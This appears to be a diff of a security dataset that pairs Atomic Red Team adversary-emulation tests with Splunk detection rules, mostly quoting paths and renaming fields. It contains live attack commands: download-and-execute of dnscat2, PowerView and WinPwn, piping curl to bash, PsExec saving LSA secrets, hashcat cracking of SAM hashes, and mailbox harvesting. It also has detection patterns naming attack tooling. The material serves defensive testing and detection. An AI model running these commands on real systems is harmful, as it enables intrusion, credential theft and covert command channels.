-QueryType TXT\n", "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')\nStart-Dnscat2 -Domain example.com -DNSServer 127.0.0.1\n" ], "commands": [], @@ -153414,7 +154086,7 @@ } }, "executor": { - "command": "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "command": "Set-Location \"PathToAtomicsFolder\"\n.\\T1071.004\\src\\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", "name": "powershell" } }, @@ -153443,7 +154115,7 @@ } }, "executor": { - "command": "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}\n", + "command": "Set-Location \"PathToAtomicsFolder\"\n.\\T1071.004\\src\\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}\n", "name": "powershell" } }, @@ -156346,7 +157018,7 @@ "command_list": [ "Invoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat\" -OutFile $env:TEMP\\discovery.bat\n", "curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > /tmp/T1074.001_discovery.log\n", - "Compress-Archive -Path \\T1074.001\\bin\\Folder_to_zip -DestinationPath $env:TEMP\\Folder_to_zip.zip -Force\n", + "Compress-Archive -Path \"\\T1074.001\\bin\\Folder_to_zip\" -DestinationPath $env:TEMP\\Folder_to_zip.zip -Force\n", "cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n", "cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n", "Copy-Item #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n", @@ -156425,7 +157097,7 @@ } }, "executor": { - "command": "Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force\n", + "command": "Compress-Archive -Path \"#{input_file}\" -DestinationPath #{output_file} -Force\n", "cleanup_command": "Remove-Item -Path #{output_file} -ErrorAction Ignore\n", "name": "powershell" } @@ -157995,13 +158667,13 @@ "dependencies": [ { "description": "Hashcat must exist on disk at specified location (#{hashcat_exe})", - "prereq_command": "if (Test-Path $(cmd /c echo #{hashcat_exe})) {exit 0} else {exit 1}", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://www.7-zip.org/a/7z1900.exe\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\7z1900.exe\"\nStart-Process -FilePath \"PathToAtomicsFolder\\..\\ExternalPayloads\\7z1900.exe\" -ArgumentList \"/S /D=PathToAtomicsFolder\\..\\ExternalPayloads\\7zi\" -NoNewWindow\nInvoke-WebRequest \"https://hashcat.net/files/hashcat-6.1.1.7z\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\hashcat6.7z\"\nStart-Process cmd.exe -Args \"/c %temp%\\7z\\7z.exe x %temp%\\hashcat6.7z -aoa -o%temp%\\hashcat-unzip\" -Wait\nNew-Item -ItemType Directory (Split-Path $(cmd /c echo #{hashcat_exe})) -Force | Out-Null\nMove-Item PathToAtomicsFolder\\..\\ExternalPayloads\\hashcat-unzip\\hashcat-6.1.1\\* $(cmd /c echo #{hashcat_exe}\\..) -Force -ErrorAction Ignore" + "prereq_command": "if (Test-Path $(cmd /c echo \"#{hashcat_exe}\")) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://www.7-zip.org/a/7z1900.exe\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\7z1900.exe\"\nStart-Process -FilePath \"PathToAtomicsFolder\\..\\ExternalPayloads\\7z1900.exe\" -ArgumentList \"/S /D=PathToAtomicsFolder\\..\\ExternalPayloads\\7zi\" -NoNewWindow\nInvoke-WebRequest \"https://hashcat.net/files/hashcat-6.1.1.7z\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\hashcat6.7z\"\nStart-Process cmd.exe -Args \"/c %temp%\\7z\\7z.exe x %temp%\\hashcat6.7z -aoa -o%temp%\\hashcat-unzip\" -Wait\nNew-Item -ItemType Directory (Split-Path $(cmd /c echo #{hashcat_exe})) -Force | Out-Null\nMove-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\hashcat-unzip\\hashcat-6.1.1\\*\" $(cmd /c echo #{hashcat_exe}\\..) -Force -ErrorAction Ignore" } ], "executor": { "command": "cd #{hashcat_exe}\\..\n#{hashcat_exe} -a 0 -m 1000 -r .\\rules\\Incisive-leetspeak.rule #{input_file_sam} #{input_file_passwords}", - "cleanup_command": "del PathToAtomicsFolder\\..\\ExternalPayloads\\hashcat6.7z >nul 2>&1\ndel PathToAtomicsFolder\\..\\ExternalPayloads\\7z1900.exe >nul 2>&1\ndel PathToAtomicsFolder\\..\\ExternalPayloads\\7z /Q /S >nul 2>&1\ndel PathToAtomicsFolder\\..\\ExternalPayloads\\hashcat-unzip /Q /S >nul 2>&1", + "cleanup_command": "del \"PathToAtomicsFolder\\..\\ExternalPayloads\\hashcat6.7z\" >nul 2>&1\ndel \"PathToAtomicsFolder\\..\\ExternalPayloads\\7z1900.exe\" >nul 2>&1\ndel \"PathToAtomicsFolder\\..\\ExternalPayloads\\7z\" /Q /S >nul 2>&1\ndel \"PathToAtomicsFolder\\..\\ExternalPayloads\\hashcat-unzip\" /Q /S >nul 2>&1", "name": "command_prompt", "elevation_required": true } @@ -158680,7 +159352,7 @@ } ], "command_list": [ - "powershell -executionpolicy bypass -command \\T1114.001\\src\\Get-Inbox.ps1 -file $env:TEMP\\mail.csv\n" + "powershell -executionpolicy bypass -command \"\\T1114.001\\src\\Get-Inbox.ps1\" -file $env:TEMP\\mail.csv\n" ], "commands": [], "queries": [], @@ -158715,12 +159387,12 @@ "dependencies": [ { "description": "Get-Inbox.ps1 must be located at #{file_path}\n", - "prereq_command": "if (Test-Path #{file_path}\\Get-Inbox.ps1) {exit 0} else {exit 1}\n", + "prereq_command": "if (Test-Path \"#{file_path}\\Get-Inbox.ps1\") {exit 0} else {exit 1}\n", "get_prereq_command": "Invoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1114.001/src/Get-Inbox.ps1\" -OutFile \"#{file_path}\\Get-Inbox.ps1\"\n" } ], "executor": { - "command": "powershell -executionpolicy bypass -command #{file_path}\\Get-Inbox.ps1 -file #{output_file}\n", + "command": "powershell -executionpolicy bypass -command \"#{file_path}\\Get-Inbox.ps1\" -file #{output_file}\n", "cleanup_command": "Remove-Item #{output_file} -Force -ErrorAction Ignore\n", "name": "powershell" } @@ -159022,7 +159694,7 @@ { "name": "Mailsniper Invoke functions", "description": "This search is to detect known mailsniper.ps1 functions executed in a machine. This technique was seen in some attacker to harvest some sensitive e-mail in a compromised exchange server.", - "search": "`powershell` EventCode=4104 ScriptBlockText IN (\"*Invoke-GlobalO365MailSearch*\", \"*Invoke-GlobalMailSearch*\", \"*Invoke-SelfSearch*\", \"*Invoke-PasswordSprayOWA*\", \"*Invoke-PasswordSprayEWS*\",\"*Invoke-DomainHarvestOWA*\", \"*Invoke-UsernameHarvestOWA*\",\"*Invoke-OpenInboxFinder*\",\"*Invoke-InjectGEventAPI*\",\"*Invoke-InjectGEvent*\",\"*Invoke-SearchGmail*\", \"*Invoke-MonitorCredSniper*\", \"*Invoke-AddGmailRule*\",\"*Invoke-PasswordSprayEAS*\",\"*Invoke-UsernameHarvestEAS*\") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `mailsniper_invoke_functions_filter`", + "search": "`powershell` EventCode=4104 ScriptBlockText IN (\"*Invoke-GlobalO365MailSearch*\", \"*Invoke-GlobalMailSearch*\", \"*Invoke-SelfSearch*\", \"*Invoke-PasswordSprayOWA*\", \"*Invoke-PasswordSprayEWS*\",\"*Invoke-DomainHarvestOWA*\", \"*Invoke-UsernameHarvestOWA*\",\"*Invoke-OpenInboxFinder*\",\"*Invoke-InjectGEventAPI*\",\"*Invoke-InjectGEvent*\",\"*Invoke-SearchGmail*\", \"*Invoke-MonitorCredSniper*\", \"*Invoke-AddGmailRule*\",\"*Invoke-PasswordSprayEAS*\",\"*Invoke-UsernameHarvestEAS*\") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `mailsniper_invoke_functions_filter`", "tags": { "name": "Mailsniper Invoke functions", "analytic_story": [ @@ -159035,7 +159707,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "mailsniper.ps1 functions $ScriptBlockText$ executed on a $Computer$ by user $user$.", + "message": "mailsniper.ps1 functions $ScriptBlockText$ executed on a $dest$ by user $user$.", "mitre_attack_id": [ "T1114", "T1114.001" @@ -159045,7 +159717,7 @@ ], "observable": [ { - "name": "Computer", + "name": "dest", "type": "Endpoint", "role": [ "Victim" @@ -160423,7 +161095,7 @@ { "name": "Active Setup Registry Autostart", "description": "This analytic is to detect a suspicious modification of the active setup registry for persistence and privilege escalation. This technique was seen in several malware (poisonIvy), adware and APT to gain persistence to the compromised machine upon boot up. This TTP is a good indicator to further check the process id that do the modification since modification of this registry is not commonly done. check the legitimacy of the file and process involve in this rules to check if it is a valid setup installer that creating or modifying this registry.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_value_name= \"StubPath\" Registry.registry_path = \"*\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components*\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `active_setup_registry_autostart_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_value_name= \"StubPath\" Registry.registry_path = \"*\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components*\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.dest Registry.user | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `active_setup_registry_autostart_filter`", "tags": { "name": "Active Setup Registry Autostart", "analytic_story": [ @@ -160440,7 +161112,7 @@ "Installation", "Exploitation" ], - "message": "modified/added/deleted registry entry $Registry.registry_path$ in $dest$", + "message": "modified/added/deleted registry entry $registry_path$ in $dest$", "mitre_attack_id": [ "T1547.014", "T1547" @@ -160675,7 +161347,7 @@ { "name": "Monitor Registry Keys for Print Monitors", "description": "This search looks for registry activity associated with modifications to the registry key `HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors`. In this scenario, an attacker can load an arbitrary .dll into the print-monitor registry by giving the full path name to the after.dll. The system will execute the .dll with elevated (SYSTEM) permissions and will persist after reboot.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.action=modified AND Registry.registry_path=\"*CurrentControlSet\\\\Control\\\\Print\\\\Monitors*\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `monitor_registry_keys_for_print_monitors_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.action=modified AND Registry.registry_path=\"*CurrentControlSet\\\\Control\\\\Print\\\\Monitors*\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `monitor_registry_keys_for_print_monitors_filter`", "tags": { "name": "Monitor Registry Keys for Print Monitors", "analytic_story": [ @@ -160949,7 +161621,8 @@ "AsyncRAT", "Amadey", "Sneaky Active Directory Persistence Tricks", - "BlackByte Ransomware" + "BlackByte Ransomware", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -161136,7 +161809,7 @@ { "name": "Spoolsv Suspicious Loaded Modules", "description": "This search is to detect suspicious loading of dll in specific path relative to printnightmare exploitation. In this search we try to detect the loaded modules made by spoolsv.exe after the exploitation.", - "search": "`sysmon` EventCode=7 Image =\"*\\\\spoolsv.exe\" ImageLoaded=\"*\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\*\" ImageLoaded = \"*.dll\" | stats dc(ImageLoaded) as countImgloaded values(ImageLoaded) as ImgLoaded count min(_time) as firstTime max(_time) as lastTime by Image Computer ProcessId EventCode | where countImgloaded >= 3 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `spoolsv_suspicious_loaded_modules_filter`", + "search": "`sysmon` EventCode=7 Image =\"*\\\\spoolsv.exe\" ImageLoaded=\"*\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\*\" ImageLoaded = \"*.dll\" | stats dc(ImageLoaded) as countImgloaded values(ImageLoaded) as ImgLoaded count min(_time) as firstTime max(_time) as lastTime by Image Computer ProcessId EventCode | rename Computer as dest | where countImgloaded >= 3 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `spoolsv_suspicious_loaded_modules_filter`", "tags": { "name": "Spoolsv Suspicious Loaded Modules", "analytic_story": [ @@ -161150,7 +161823,7 @@ "Installation", "Exploitation" ], - "message": "$Image$ with process id $process_id$ has loaded a driver from $ImageLoaded$ on endpoint $Computer$. This behavior is suspicious and related to PrintNightmare.", + "message": "$Image$ with process id $ProcessId$ has loaded a driver from $ImageLoaded$ on endpoint $dest$. This behavior is suspicious and related to PrintNightmare.", "mitre_attack_id": [ "T1547.012", "T1547" @@ -161160,26 +161833,11 @@ ], "observable": [ { - "name": "Computer", + "name": "dest", "type": "Endpoint", "role": [ "Victim" ] - }, - { - "name": "process_id", - "type": "Process Name", - "role": [ - "Parent Process", - "Attacker" - ] - }, - { - "name": "ImageLoaded", - "type": "File", - "role": [ - "Other" - ] } ], "risk_score": 72, @@ -161362,7 +162020,7 @@ { "name": "Time Provider Persistence Registry", "description": "This analytic is to detect a suspicious modification of time provider registry for persistence and autostart. This technique can allow the attacker to persist on the compromised host and autostart as soon as the machine boot up. This TTP can be a good indicator of suspicious behavior since this registry is not commonly modified by normal user or even an admin.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders*\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `time_provider_persistence_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders*\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `time_provider_persistence_registry_filter`", "tags": { "name": "Time Provider Persistence Registry", "analytic_story": [ @@ -161380,7 +162038,7 @@ "Installation", "Exploitation" ], - "message": "modified/added/deleted registry entry $Registry.registry_path$ in $dest$", + "message": "modified/added/deleted registry entry $registry_path$ in $dest$", "mitre_attack_id": [ "T1547.003", "T1547" @@ -161883,7 +162541,7 @@ } ], "command_list": [ - "\\..\\ExternalPayloads\\T1003.004\\bin\\PsExec.exe -accepteula -s reg save HKLM\\security\\policy\\secrets %temp%\\secrets /y" + "\"\\..\\ExternalPayloads\\T1003.004\\bin\\PsExec.exe\" -accepteula -s reg save HKLM\\security\\policy\\secrets %temp%\\secrets /y\n" ], "commands": [], "queries": [], @@ -161913,12 +162571,12 @@ "dependencies": [ { "description": "PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})", - "prereq_command": "if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}", - "get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\PSTools.zip\"\nExpand-Archive PathToAtomicsFolder\\..\\ExternalPayloads\\PSTools.zip PathToAtomicsFolder\\..\\ExternalPayloads\\PSTools -Force\nNew-Item -ItemType Directory (Split-Path #{psexec_exe}) -Force | Out-Null\nCopy-Item PathToAtomicsFolder\\..\\ExternalPayloads\\PSTools\\PsExec.exe #{psexec_exe} -Force" + "prereq_command": "if (Test-Path \"#{psexec_exe}\") {exit 0} else {exit 1}", + "get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\PSTools.zip\"\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\PSTools.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\PSTools\" -Force\nNew-Item -ItemType Directory (Split-Path \"#{psexec_exe}\") -Force | Out-Null\nCopy-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\PSTools\\PsExec.exe\" \"#{psexec_exe}\" -Force" } ], "executor": { - "command": "#{psexec_exe} -accepteula -s reg save HKLM\\security\\policy\\secrets %temp%\\secrets /y", + "command": "\"#{psexec_exe}\" -accepteula -s reg save HKLM\\security\\policy\\secrets %temp%\\secrets /y\n", "cleanup_command": "del %temp%\\secrets >nul 2> nul", "name": "command_prompt", "elevation_required": true @@ -163113,7 +163771,157 @@ "commands": [], "queries": [], "parsed_datasets": [], - "possible_detections": [], + "possible_detections": [ + { + "name": "Suspicious Process Executed From Container File", + "description": "This analytic identifies a suspicious process spawned by another process from within common container/archive file types. This technique was a common technique used by adversaries and malware to execute scripts or evade defenses. This TTP may detect some normal software installation or user behaviors where opening archive files is common.", + "search": "| tstats `security_content_summariesonly` count values(Processes.process_name) as process_name min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN (\"*.ZIP\\\\*\",\"*.ISO\\\\*\",\"*.IMG\\\\*\",\"*.CAB\\\\*\",\"*.TAR\\\\*\",\"*.GZ\\\\*\",\"*.RAR\\\\*\",\"*.7Z\\\\*\") AND Processes.action=\"allowed\" by Processes.dest Processes.parent_process Processes.process Processes.user| `drop_dm_object_name(Processes)`| regex process=\"(?i).*(ZIP|ISO|IMG|CAB|TAR|GZ|RAR|7Z)\\\\\\\\.+\\.(BAT|BIN|CAB|CMD|COM|CPL|EX_|EXE|GADGET|INF1|INS|INX||HTM|HTML|ISU|JAR|JOB|JS|JSE|LNK|MSC|MSI|MSP|MST|PAF|PIF|PS1|REG|RGS|SCR|SCT|SHB|SHS|U3P|VB|VBE|VBS|VBSCRIPT|WS|WSF|WSH)\\\"?$\" | rex field=process \"(?i).+\\\\\\\\(?[^\\\\\\]+\\.(ZIP|ISO|IMG|CAB|TAR|GZ|RAR|7Z))\\\\\\\\((.+\\\\\\\\)+)?(?.+\\.(BAT|BIN|CAB|CMD|COM|CPL|EX_|EXE|GADGET|INF1|INS|INX||HTM|HTML|ISU|JAR|JOB|JS|JSE|LNK|MSC|MSI|MSP|MST|PAF|PIF|PS1|REG|RGS|SCR|SCT|SHB|SHS|U3P|VB|VBE|VBS|VBSCRIPT|WS|WSF|WSH))\\\"?$\"| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_process_executed_from_container_file_filter`", + "tags": { + "name": "Suspicious Process Executed From Container File", + "analytic_story": [ + "Unusual Processes" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Installation", + "Exploitation" + ], + "message": "A suspicious process $process_name$ was launched from $file_name$ on $dest$.", + "mitre_attack_id": [ + "T1204.002", + "T1036.008" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Endpoint", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "file_name", + "type": "File Name", + "role": [ + "Attacker" + ] + } + ], + "risk_score": 16, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1204.002", + "mitre_attack_technique": "Malicious File", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT-C-36", + "APT12", + "APT19", + "APT28", + "APT29", + "APT30", + "APT32", + "APT33", + "APT37", + "APT38", + "APT39", + "Ajax Security Team", + "Andariel", + "Aoqin Dragon", + "BITTER", + "BRONZE BUTLER", + "BlackTech", + "CURIUM", + "Cobalt Group", + "Confucius", + "Dark Caracal", + "DarkHydrus", + "Darkhotel", + "Dragonfly", + "EXOTIC LILY", + "Earth Lusca", + "Elderwood", + "Ember Bear", + "FIN4", + "FIN6", + "FIN7", + "FIN8", + "Ferocious Kitten", + "Gallmaker", + "Gamaredon Group", + "Gorgon Group", + "HEXANE", + "Higaisa", + "Inception", + "IndigoZebra", + "Indrik Spider", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "Machete", + "Magic Hound", + "Mofang", + "Molerats", + "MuddyWater", + "Mustang Panda", + "Naikon", + "Nomadic Octopus", + "OilRig", + "PLATINUM", + "PROMETHIUM", + "Patchwork", + "RTM", + "Rancor", + "Sandworm Team", + "SideCopy", + "Sidewinder", + "Silence", + "TA459", + "TA505", + "TA551", + "The White Company", + "Threat Group-3390", + "Tonto Team", + "Transparent Tribe", + "Tropic Trooper", + "WIRTE", + "Whitefly", + "Windshift", + "Wizard Spider", + "admin@338", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1036.008", + "mitre_attack_technique": "Masquerade File Type", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [] + } + ] + } + } + ], "external_reference": [], "controls": [], "x_mitre_network_requirements": false, @@ -165198,11 +166006,11 @@ "net user /domain\nnet group /domain\n", "net user /domain\nget-localgroupmember -group Users\nget-aduser -filter *\n", "query user /SERVER:%COMPUTERNAME%\n", - "Invoke-Expression \\..\\ExternalPayloads\\ADRecon.ps1\n", - "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties\n", - "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -sc admincountdmp\n", - "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -f (objectcategory=person)\n", - "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -sc exchaddresses\n", + "Invoke-Expression \"\\..\\ExternalPayloads\\ADRecon.ps1\"\n", + "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties\n", + "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -sc admincountdmp\n", + "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -f (objectcategory=person)\n", + "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -sc exchaddresses\n", "net user administrator /domain\n", "Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=524288)' -Server $env:UserDnsDomain\n", "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose\n", @@ -165210,13 +166018,13 @@ "(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]\"$_\").gPlink){Write-Host \"[+] OU Path:\"([ADSI]\"$_\").Path;$a=((([ADSI]\"$_\").gplink) -replace \"[[;]\" -split \"]\");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host \"Policy Path[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host \"Policy Name[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output \"`n\" }}\n", "(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]\"$_\").gPlink){Write-Host \"[+] Domain Path:\"([ADSI]\"$_\").Path;$a=((([ADSI]\"$_\").gplink) -replace \"[[;]\" -split \"]\");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host \"Policy Path[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host \"Policy Name[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output \"`n\" }}\n", "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ngeneraldomaininfo -noninteractive -consoleoutput", - "cd \\..\\ExternalPayloads\n.\\kerbrute.exe userenum -d $env:USERDOMAIN --dc $env:UserDnsDomain \\..\\ExternalPayloads\\username.txt", + "cd \"\\..\\ExternalPayloads\"\n.\\kerbrute.exe userenum -d $env:USERDOMAIN --dc $env:UserDnsDomain \"\\..\\ExternalPayloads\\username.txt\"", "$target = $env:LOGONSERVER\n$target = $target.Trim(\"\\\\\")\n$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString\nwmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\\\ntlmusers.evtx /q:\\\"Event[System[(EventID=4776)]]\"'", "Get-ADComputer $env:computername -Properties *", "Get-ADComputer $env:computername -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime", "Get-adcomputer -SearchScope subtree -filter \"name -like '*'\" -Properties *", - "\\..\\ExternalPayloads\\AdFind.exe -h $env:USERDOMAIN -s subtree -f \"objectclass=computer\" *", - "\\..\\ExternalPayloads\\AdFind.exe -h $env:USERDOMAIN -s subtree -f \"objectclass=computer\" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime", + "& \"\\..\\ExternalPayloads\\AdFind.exe\" -h $env:USERDOMAIN -s subtree -f \"objectclass=computer\" *\n", + "& \"\\..\\ExternalPayloads\\AdFind.exe\" -h $env:USERDOMAIN -s subtree -f \"objectclass=computer\" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime\n", "ldapsearch -H ldap://example.test:389 -x -D user@example.test -w s3CurePssw0rD! -b \"CN=Users,DC=example,DC=test\" -s sub -a always -z 1000 dn\n", "net user #{domain.user.name} /domain", "net user /domain" @@ -165292,13 +166100,13 @@ "dependencies": [ { "description": "ADRecon must exist on disk at specified location (#{adrecon_path})\n", - "prereq_command": "if (Test-Path #{adrecon_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -Uri \"https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1\" -OutFile #{adrecon_path}\n" + "prereq_command": "if (Test-Path \"#{adrecon_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -Uri \"https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1\" -OutFile \"#{adrecon_path}\"\n" } ], "executor": { - "command": "Invoke-Expression #{adrecon_path}\n", - "cleanup_command": "Get-ChildItem PathToAtomicsFolder\\..\\ExternalPayloads -Recurse -Force | Where{$_.Name -Match \"^ADRecon-Report-\"} | Remove-Item -Force -Recurse\n", + "command": "Invoke-Expression \"#{adrecon_path}\"\n", + "cleanup_command": "Get-ChildItem \"PathToAtomicsFolder\\..\\ExternalPayloads\" -Recurse -Force | Where{$_.Name -Match \"^ADRecon-Report-\"} | Remove-Item -Force -Recurse\n", "name": "powershell" } }, @@ -165313,12 +166121,12 @@ "dependencies": [ { "description": "AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe)\n", - "prereq_command": "if (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe) -ErrorAction ignore | Out-Null\nInvoke-WebRequest -Uri 